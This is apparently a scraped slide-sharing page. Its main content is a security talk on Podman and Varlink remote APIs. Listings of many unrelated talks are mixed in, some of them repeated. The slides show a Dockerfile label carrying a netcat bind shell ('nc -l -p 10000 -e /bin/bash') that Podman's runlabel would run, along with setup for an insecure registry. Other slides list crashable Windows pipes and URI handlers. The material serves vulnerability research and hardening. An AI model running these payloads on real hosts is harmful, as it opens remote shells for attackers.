With the 'rise of containers' comes also the rise of container platforms. And while Docker is the way to do things for now, Podman has also been gaining traction as the new kid on the block especially after being somewhat embraced by RedHat and Fedora. Being new also comes with lack of heavy scrutiny and audit on the security side of things. Once you start integrating other protocols and pieces that compliment each other, such as Varlink, boundaries become fuzzy. Rather than focus on container breakouts, which are also very important, we'll focus on how Podman and Varlink interoperate and the authentication and security implications as such. We'll look at the remote API capabilities, secure configurations and how certain setups and projects out there by default can be vulnerable to compromise. By the end of the talk, we will have discussed various bugs, issues and hardening techniques around deploying Podman and Varlink together and if you don't know a lot about containers, you'll learn a bit along the way.
Kubernetes Story - Day 1: Build and Manage Containers with PodmanMihai Criveti
OpenShift Workshop Day 1: https://www.youtube.com/watch?v=3IuaZu8-fsY - Build and Manage Containers with Podman
In this workshop you'll learn how to build and manage containers, publish images to Quay, then install and deploy containers onto OpenShift.
Kubernetes Story - Day 1: Build and Manage Containers with PodmanMihai Criveti
OpenShift Workshop Day 1: https://www.youtube.com/watch?v=3IuaZu8-fsY - Build and Manage Containers with Podman
In this workshop you'll learn how to build and manage containers, publish images to Quay, then install and deploy containers onto OpenShift.
How to Improve Your Image Builds Using Advance Docker BuildDocker, Inc.
Nicholas Dille, Haufe-Lexware + Docker Captain -
Docker continues to be the standard tool for building container images. For more than a year Docker ships with BuildKit as an alternative image builder, providing advanced features for secret and cache management. These features help to make image builds faster and more secure. In this session, Docker Captain Nicholas Dille will teach you how to use Buildkit features to your advantage.
DMMは日本で最大級の動画配信サービスを提供しています。
昨今はニーズの多様化と高品質への対応が急務となっており、動画配信基盤の刷新に取り組んでいます。モノリシックなシステムをマイクロサービス化すべく、Ruby on Rails・AngularJS・Go を利用しています。本セッションでは、それらのアーキテクトや開発フローについて判りやすく説明します。
***** DevOps Masters Program : https://www.edureka.co/masters-program/devops-engineer-training *****
This DevOps Docker Commands tutorial ( Docker Tutorial Blog Series: https://goo.gl/z93Ed1 ) will introduce you to the most commonly used Docker commands. The Hands-On session is performed on an Ubuntu-64 bit machine in which Docker is installed.
To learn how Docker can be used to integrate multiple DevOps tools, watch the video titled 'DevOps Tools', by clicking this link: https://goo.gl/up9iwd
A Gentle Introduction To Docker And All Things ContainersJérôme Petazzoni
Docker is a runtime for Linux Containers. It enables "separation of concern" between devs and ops, and solves the "matrix from hell" of software deployment. This presentation explains it all! It also explains the role of the storage backend and compares the various backends available. It gives multiple recipes to build Docker images, including integration with configuration management software like Chef, Puppet, Salt, Ansible. If you already watched other Docker presentations, this is an actualized version (as of mid-November 2013) of the thing!
When you are designing a production environment security is essential. All the Docker ecosystem but in particular Docker Swarm allows us to ship our containers out of our laptop, how can we make this process safe? During my talk, I will share tips around production environment, immutability and how troubleshooting common attack as code injection with Docker. Static analysis of our images, content trust with Notary to make our journey secure.
How can we setup a cluster on the main cloud providers with VPN and node labeling to expose only a portion of our cluster? I will also show what Docker provides (Content Trust, Static Analysis) but also open source alternatives as Notary, centos/clair and Cilium.
In the end of this talk, we had a better idea around how manage Docker in production.
How to Improve Your Image Builds Using Advance Docker BuildDocker, Inc.
Nicholas Dille, Haufe-Lexware + Docker Captain -
Docker continues to be the standard tool for building container images. For more than a year Docker ships with BuildKit as an alternative image builder, providing advanced features for secret and cache management. These features help to make image builds faster and more secure. In this session, Docker Captain Nicholas Dille will teach you how to use Buildkit features to your advantage.
DMMは日本で最大級の動画配信サービスを提供しています。
昨今はニーズの多様化と高品質への対応が急務となっており、動画配信基盤の刷新に取り組んでいます。モノリシックなシステムをマイクロサービス化すべく、Ruby on Rails・AngularJS・Go を利用しています。本セッションでは、それらのアーキテクトや開発フローについて判りやすく説明します。
***** DevOps Masters Program : https://www.edureka.co/masters-program/devops-engineer-training *****
This DevOps Docker Commands tutorial ( Docker Tutorial Blog Series: https://goo.gl/z93Ed1 ) will introduce you to the most commonly used Docker commands. The Hands-On session is performed on an Ubuntu-64 bit machine in which Docker is installed.
To learn how Docker can be used to integrate multiple DevOps tools, watch the video titled 'DevOps Tools', by clicking this link: https://goo.gl/up9iwd
A Gentle Introduction To Docker And All Things ContainersJérôme Petazzoni
Docker is a runtime for Linux Containers. It enables "separation of concern" between devs and ops, and solves the "matrix from hell" of software deployment. This presentation explains it all! It also explains the role of the storage backend and compares the various backends available. It gives multiple recipes to build Docker images, including integration with configuration management software like Chef, Puppet, Salt, Ansible. If you already watched other Docker presentations, this is an actualized version (as of mid-November 2013) of the thing!
When you are designing a production environment security is essential. All the Docker ecosystem but in particular Docker Swarm allows us to ship our containers out of our laptop, how can we make this process safe? During my talk, I will share tips around production environment, immutability and how troubleshooting common attack as code injection with Docker. Static analysis of our images, content trust with Notary to make our journey secure.
How can we setup a cluster on the main cloud providers with VPN and node labeling to expose only a portion of our cluster? I will also show what Docker provides (Content Trust, Static Analysis) but also open source alternatives as Notary, centos/clair and Cilium.
In the end of this talk, we had a better idea around how manage Docker in production.
Wireless technology is inherently insecure in general, however this presentation details some unconventional attacks that have been around for years but are still incredibly effective. Discussing the basics of AP cloning, abusing captive portals, and more.
The age of IoT is at our threshold. Many large-scale companies have already started developing security solutions to make this brave new world safe. One of possible, we may even say, surefire approaches is to create a device which would connect to a network and protect other devices in it. Let’s discuss the efficiency of the given approach in relation to BitDefender Box.
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...Outlyer
Bobby is a Consultant DevOps Engineer who currently works with UK Cloud’s clients to help them understand DevOps, how to improve their automation and migrate to a cloud-native environment. Bobby has over twenty years of experience working with the web and has most recently been working with public sector clients on their latest projects.
13 practical tips for writing secure golang applicationsKarthik Gaekwad
Writing secure applications in a new language is challenging. Here are some tips to help get you started for writing secure code in golang. Presented at Lascon 2015
Long thought to be relegated to the domain of fast, multithreaded desktop applications, race conditions have made their way into web applications. These bugs are often difficult to test for, and are becoming increasingly prevalent due to faster and faster clients, while server-side languages like Node.js and PHP are struggling to keep up. Race conditions are no longer just bugs- when they are found in critical components of web applications, they become a serious security vulnerability. If the proper checks and defensive measures are not in place, databases get confused, “one-time-use” becomes a relative term, and “limited” becomes “unlimited”. This talk will detail specific examples where malicious users could cause damage or profit from a race-condition flaw in a web application. A custom open-source tool will also be introduced to help security researchers and developers easily check for this class of vulnerability in web applications.
Start guide to web scraping with Scrapy, one of best python modules to do web scraping, with Scrapy everything is more easy.
This presentation covers the key concepts of scrapy and the process of criation of spiders.
It's the first draft version and will be other versions, until the last version, if you see something that you want to be improved, give feedback and I will take that in consideration.
I also talk about some alternatives to scrapy like lxml, newspapers and others.
In the final i give you acess to the code used on this presentation, so you cant test easy and fast the concepts talked on this presentation.
I hope you like it :D
This is story of our journey from SaltStack to Puppet and beyond. This talk will answer following questions:
- why we moved from SaltStack
- why Puppet was chosen
- how to use Puppet OpenSource in painless way
- which orchestration tool to use with Puppet
- what is next
DragonCon 2016
Attack surface on Windows is vast and full of opportunities. It has been explored upside down and inside out, although there's always room for other ways to look at it. In this talk, I'll be discussing how to discover attack surface by poking the OS in various ways to reveal interfaces and opportunities often otherwise found by either luck or winning a timing race. Starting a discussion on these components will shake out new bugs or design subtleties as they may have yet to be audited in depth. We'll walk through tooling for both the offensive and defensive angles. I'll be looking at the latest version of Windows 10 and also Server. If you're interested in finding vulnerabilities in the most prevalent platform on earth, or a developer with the urge to know more about application security, this talk is for you and will probably give you some new ideas.
Provoking Windows
For every action, there is a reaction
MSI installer creates many mutexes
Notably one called _MSIExecute
RW Everyone
Commonly checked to ensure only one installation at a time is occurring
Interesting #1
But, everyone can write to \BNO…
Turn on WLAN Autoconfig Service
New pipe with a very generous ACEs…
\\.\pipe\WiFiNetworkManagerTask
O:LSG:LSD:(A;;FA;;;WD)(A;;FA;;;CO)(A;;FA;;;IU)(A;;FA;;;RC)(A;;FA;;;BA)
Interesting #2
We can kill the pipe by looping large Write()s
But what happened?
svchost.exe @ wifinetworkmanager.dll
STATUS_STACK_BUFFER_OVERRUN
wifinetworkmanager.dll!__FatalError(char const *,unsigned long,char const *, …..)
AsyncPipe::ReadCompletedCallback(void)
AsyncPipe::Dispatch(int,void *,void *, …..)
Synchronizer::EnqueueEvent(…..)
\Driver\SoftwareDevice
BUILTIN_DRIVER (???)
SoftwareDevice class per c_swdevice.inf
Doesn’t have .sys loaded, nor many normal things
Exposes many devices during RDP sessions
Some of which are RW everyone
Windows Time
Creates an Event
W32TIME_NAMED_EVENT_SYSTIME_NOT_CORRECT
Squatting on this event produces an exception
svchost.exe @ ntdll.dll (w32time.dll in call stack)
STATUS_STACK_BUFFER_OVERRUN
Not likely a controllable crash, but notable nonetheless
wpa://C:\[trace file path here]/
Launches Windows Performance Analyzer on arbitrary file
Local bugs in WPA file parsing become remote
wpa://\\share\PhotosAppTracing.etl/
.etl, .wpa, .xml, .wpapk, .zip, .cab all fair game
The “crash immediately” club
com.microsoft.builder3d:///
hx-accounts:///
microsoft.windows.photos.crop:///
microsoft.windows.photos.picker:///
ms-wpdrmv:///
ms-apprep:/// (smartscreen)
read:/// (edge)
Tooling
Whale
“What happened at last exec?”
At the end of the day, the ones writing the code also wrote the bugs
No other people put bugs in your code (probably)
Thoughts on Disclosure
There’s no overall good way to disclose
Coordinated Disclosure
Great for vendor, not great for everyone else
Drop bug
Varies depending on your subscribed philosophy
Thinking of fuzzing applications on OS X can quickly lead to a passing conversation of "ooh exotic Mac stuff", "lets fuzz the kernel" or it can otherwise not be thought of as an exciting target, at least for looking for crashes in stuff other than Safari or the iPhone. While there are some intricacies and nuance involved, workaround for security protections to enable debugging and finding tools that work and work well, this research will detail how it can be done in a reliable way and make the topic more tangible and easier to digest, kind of like how people think about using AFL on Linux: it "just works". We'll explore some of the overlooked attack surface of file parsers and some network services on Mac, how to fuzz userland binaries and introduce a new fuzzer that makes setup and crash triage straightforward while poking at some Apple core apps and clients. Have you ever thought "This thing has got to have some bugs" but think twice because it's only on available on Mac and not worth the effort? If so, you may now find yourself both more motivated and better equipped to do some bug hunting on the sleek and eventually accommodating Mac OS.
Your SSH server configs are secure, right? If you search for hardening SSH, you can read all day about how this or that option is dangerous, or never use that flag, etc. But what really is the risk of compromise? This talk will explore various (mis)configurations and ways to use the client that perhaps have been deemed risky, but also walk through how exactly to attack them to bypass restrictions on the server or even get a shell. We'll also discuss some options that sound really bad, but more nuance is required to fully grasp what it takes to exploit the issue. You might even learn about some new features that let SSH do things you didn't think were really possible, or worse case you'll get a refresher on many attacks that have been mostly forgotten or ignored. Instead of just looking at a config or script and saying "that's bad, shouldn't do that", after this talk you should be able to demo various attacks yourself.
In this talk, we'll break down how one can exploit an ecosystem that enables management, querying, processing, and storage of, yes you guessed it, copious amounts of data. Hadoop and its many friends have been making their way into companies analyzing (sometimes, after massively collecting...) such data for years now, but they also make it easy to find organizations deploying things internally with security either off by default or otherwise exposed to various critical misconfigurations and access control issues.
If you're running engagements, this should also give you a headstart on what to look for, how to attack networks where these products are running along with a few good ways to make them more defendable. Because if you want to defend well, you need to optimize towards mitigating actual risk vs theoretical, and there's no better way to determine if attacks are real than trying them out yourself. Let's say you just want to better understand how to shell out on servers running Apache Cassandra, Drill, Mesos... well, it may add a few pages to your playbook.
(FYI this is the version of the slides without a conference template-- hopefully NoConName will share the templated version online as well)
What happens when a company either doesn’t fully empower the Security team, or have one at all? Stuff like Goto fail, Equifax, unsandboxed AVs and infinite other buzz, or yet to be buzzed, words describe failures of not adequately protecting customers or services they rely on. Having a solid security team enables a company to set a bar, ensure security exists within the design, insert tooling at various stages of the process and continuously iterate on such results. Working with the folks building the products to give them solutions instead of just problems allows one to scale, earn trust and most importantly be effective and actually ship.
There’s a whole security industry out there with folks wearing every which hat you can think of. They have influence and the ability to find a bug one day and disclose it the next, so companies must adapt both engineering practices and perspectives in order to ‘navigate the waters of reality’ and not just hope one doesn’t take a look at their product. Having processes in place that reduce attack surface, automate testing and set a minimum bar can reduce bugs therefore randomization for devs therefore cost of patching and create a culture where security makes more sense as it demonstratively solves problems.
Nvidia is evolving in this space. Focused on the role of product security, I’ll go through the various components of a security team and how they each interact and complement each other, commodity and niche tooling as well as how relationships across organizations can give one an edge in this area. This talk balances the perspective of security engineers working within a large company with the independent nature of how things work in the industry.
Attendees will walk away with a breadth of knowledge, an inside view of the technical workings, tooling and intricacies of finding and fixing bugs and finding balance within a product-first world.
Microsoft Vulnerability Research - How to be a finder as a vendorJeremy Brown
You may think of Microsoft as a company that fixes vulnerabilities, but we frequently find security issues in other vendors’ products as well. Microsoft Vulnerability Research (MSVR) was created to help ensure that our company demonstrates the same behavior, in the role of a finder, that we’d like to see from other companies and researchers from all over the world. We make sure that our reports are complete and accurate and communicated securely and effectively to the right place. This presentation will cover how and why MSVR was created, an in-depth look at our operations and what we’ve learned so far with this program. We’ll also discuss how your company can have a centralized program to do the same. We’ll finish things off with a run through of an example vulnerability that one of our finders discovered, reported through MSVR, and what is was like working to get it fixed with an advisory we released thereafter.
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
The web client is critical software to secure from any perspective. No matter if you're an organization or a casual client, you're typically just as vulnerable as anyone else. OSes are often supplemented with hardening toolsets or built-in mitigations as an extra measure to avoid compromise, but as with all things, they aren't completely solid either. Thus the need for systems that break systems, some of which deploy fuzzing and almost all of them work to find implementation bugs. Browser fuzzing has been explored and improved in many different ways over the past several years. In this presentation, we'll be primarily talking about a mutation engine that provides a somewhat novel technique for finding bugs in a still-ripe attack surface: the browser's rendering engine. This technique has the flexibility to be applied even more broadly than browsers, for example, there's initial support for fuzzing PDF readers. We'll also be discussing the tooling and infrastructure areas of the process, detailing what's needed to build a system that will scale and enable your fuzzing strategies to be successful. Finally, we can conclude the talk with some incubation results and how you can start making use of these fuzzing techniques today to find the bugs you need to exploit browsers or identify and fix the code responsible for each vulnerability.
POC Conference 2015
Virtual Appliances have become very prevalent these days as virtualization is ubiquitous and hypervisors commonplace. More and more of the major vendors are providing literally virtual clones for many of their once physical-only products. Like IoT and the CAN bus, it's early in the game and vendors are late as usual. One thing that it catching these vendors off guard is the huge additional attack surface, ripe with vulnerabilities, added in the process. Also, many vendors see software appliances as an opportunity for the customer to easily evaluate the product before buying the physical one, making these editions more accessible and debuggable by utilizing features of the platform on which it runs. During this talk, I will provide real case studies for various vulnerabilities created by mistakes that many of the major players made when shipping their appliances. You'll learn how to find these bugs yourself and how the vendors went about fixing them, if at all. By the end of this talk, you should have a firm grasp of how one goes about getting remote root on appliances.
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And, he'll give you some useful guidelines on how to close the gaps yourself.
A Bug Hunter's Perspective on Unix DriversJeremy Brown
The Unix driver space with regards to security has been understudied compared to it’s vast attack surface. One juicy area that can be especially buggy and accessible in drivers, I/O control, has received much more attention on Windows than Unix OSes. In this presentation, I will give an introduction to this particular attack surface on Linux, why bugs here are a significant threat and show you how get started looking for vulnerabilities in drivers on the platform. I’ll also go into some of the tools and techniques available and talk about a new tool I’ve written that can help bug hunters dig into Unix device drivers.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Welcome to the first live UiPath Community Day Dubai! Join us for this unique occasion to meet our local and global UiPath Community and leaders. You will get a full view of the MEA region's automation landscape and the AI Powered automation technology capabilities of UiPath. Also, hosted by our local partners Marc Ellis, you will enjoy a half-day packed with industry insights and automation peers networking.
📕 Curious on our agenda? Wait no more!
10:00 Welcome note - UiPath Community in Dubai
Lovely Sinha, UiPath Community Chapter Leader, UiPath MVPx3, Hyper-automation Consultant, First Abu Dhabi Bank
10:20 A UiPath cross-region MEA overview
Ashraf El Zarka, VP and Managing Director MEA, UiPath
10:35: Customer Success Journey
Deepthi Deepak, Head of Intelligent Automation CoE, First Abu Dhabi Bank
11:15 The UiPath approach to GenAI with our three principles: improve accuracy, supercharge productivity, and automate more
Boris Krumrey, Global VP, Automation Innovation, UiPath
12:15 To discover how Marc Ellis leverages tech-driven solutions in recruitment and managed services.
Brendan Lingam, Director of Sales and Business Development, Marc Ellis
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™UiPathCommunity
In questo evento online gratuito, organizzato dalla Community Italiana di UiPath, potrai esplorare le nuove funzionalità di Autopilot, il tool che integra l'Intelligenza Artificiale nei processi di sviluppo e utilizzo delle Automazioni.
📕 Vedremo insieme alcuni esempi dell'utilizzo di Autopilot in diversi tool della Suite UiPath:
Autopilot per Studio Web
Autopilot per Studio
Autopilot per Apps
Clipboard AI
GenAI applicata alla Document Understanding
👨🏫👨💻 Speakers:
Stefano Negro, UiPath MVPx3, RPA Tech Lead @ BSP Consultant
Flavio Martinelli, UiPath MVP 2023, Technical Account Manager @UiPath
Andrei Tasca, RPA Solutions Team Lead @NTT Data
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
2. whoami
(No fancy title/bio today)
• ~decade in the industry
• @ Amazon, Microsoft, Nvidia playing offense, defense whatever … generally
trying to be effective across security domains as well as my own fun research
• Prior published research
• Bugs on many different platforms, clients, servers, drivers, virtual appliances,
cloud, fuzzing, generally exploring and thinking about how to break and/or fix
lots of different stuff, ….
References:
https://packetstormsecurity.com/files/author/6650/
https://www.slideshare.net/JeremyBrown37/presentations
3. whoami
ok ok if you must you can call me uh…
Senior CEO of Independent Research, Manager et al
4. Agenda
I. Podman? Varlink?
II. Local and remote attack surface
III. Some bugs and bad configurations
IV. Exploitation
V. Hardening
VI. Conclusion
“You get on the horn, I throw some peanuts at ‘em and we’ll in Des Moines in no time….”
Reference: Tommy Boy (movie)
5. What is Varlink?
• Newer IPC protocol, implementation and toolset
• JSON based protocol for exchanging messages
• Meant to be an upgrade over D-bus, BUS1, custom proto /w unix sockets, etc
• “plain-text, type-safe, discoverable, self-documenting, remotable, testable,
easy to debug… accessible from any programming environment”
• Not much security chatter on it
• But OSS-fuzz seems to have picked it up recently
References
https://varlink.org
https://github.com/systemd/systemd/tree/master/test/fuzz/fuzz-varlink
7. What is Varlink?
• A few different components and deployment scenarios
• Clients and services support for many different languages and system setups
• Even can setup a kernel driver to query via device:/dev/org.kernel….stuff
• It does a lot of stuff, but let’s focus on how it fits with Podman
• They integrated Varlink to create ways to do “remote API” functionality
Reference: http://www.projectatomic.io/blog/2018/05/podman-varlink/
9. What is Podman?
• Lots of local podman commands map to varlink remote API methods
• https://github.com/containers/libpod/tree/master/cmd/podman
• https://github.com/containers/libpod/tree/master/pkg/varlinkapi
• Also not much public security research on it
• Only (1) CVE so far
• https://www.cvedetails.com/cve/CVE-2018-10856/
Reference: https://github.com/containers/libpod/
10.
11. Together by default on Fedora Server
• Podman + Varlink installed out of the box instead of Docker
• Also rumored that RHEL8 will have Podman too
• RedHat and Fedora folks seem to really like it
• Remote services aren’t running by default AFAIK yet
• They can be configured to run in different ways and some projects want or
support listening over the network setups
Reference: https://dwalsh.fedorapeople.org/ReplacingDockerWithPodman.pdf
12. Focus and !focus
• Focus
• Podman (1.4/1.5) + Varlink integration
• Remote APIs
• Local or remote privilege escalation on the HOST
• !focus
• Container escapes, although these are cool too
13. So how do I run this thing?
Reference: https://github.com/containers/libpod/issues/3344
14. Attack Surface
• podman local process running as root
• ACLs say if a unprivileged user can talk to it or not
21. How do I test this thing?
• dnf install python3-varlink
References:
https://varlink.org/python/
https://blog.tomecek.net/post/recent-news-in-container-tech/
25. Uh what’s a label?
Reference: https://podman.io/blogs/2018/12/03/podman-runlabel.html
26. Ok create a cool Dockerfile
FROM busybox
LABEL run=“nc -l -p 10000 -e /bin/bash”
$ docker build -t imageX .
or other stuff for your reverse jazz…
References:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes.pdf
27. And setup a private docker registry to host it
$ docker-compose up
$ docker tag image localhost:5000/imageX
$ docker push localhost:5000/imageX
(edit /etc/containers/registries.conf for testing)
[registries.insecure]
registries = [‘docker-registry:5000’]
32. So that means…
